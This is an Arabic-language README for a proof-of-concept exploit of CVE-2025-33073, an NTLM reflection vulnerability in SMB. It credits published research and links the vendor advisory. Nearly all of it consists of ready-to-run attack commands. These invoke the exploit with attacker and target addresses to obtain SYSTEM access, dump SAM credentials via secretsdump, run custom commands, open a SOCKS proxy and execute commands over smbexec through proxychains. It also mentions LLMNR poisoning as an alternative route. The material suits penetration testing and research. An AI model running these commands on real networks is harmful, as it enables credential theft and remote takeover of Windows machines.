
إثبات المفهوم (PoC) لاستغلال ثغرة انعكاس NTLM في بروتوكول SMB.
استغلال PoC لثغرة انعكاس NTLM في SMB.
كل الفضل يعود للبحث الرسمي:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نظام التشغيل: Kali Linux (يحتوي على معظم الحزم مثبتة مسبقًا).
الواجهة الرسومية (GUI)
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

واجهة سطر الأوامر (CLI)
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

أمر مخصص
بدلاً من تشغيل secretsdump يمكن تنفيذ أمر مخصص.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
لتنفيذ أوامر أكثر تمويهًا بعد إنشاء اتصال صالح بصلاحيات SYSTEM. يجب أن يكون --target و --target-ip متساويين هنا.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
يمكن أيضًا تشغيل أمر مخصص عبر proxychains بدلاً من تفريغ SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

إذا كنت في نفس نطاق البث (broadcast domain) الخاص بالجهاز وكان الجهاز عرضة لتسميم LLMNR فمن الممكن استغلال جهاز دون الحاجة إلى تسجيل سجل DNS.

مصادقة NTLM المحلية تتم

مصادقة NTLM المحلية لا تتم مما يؤدي إلى محاولة فاشلة FAILED

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073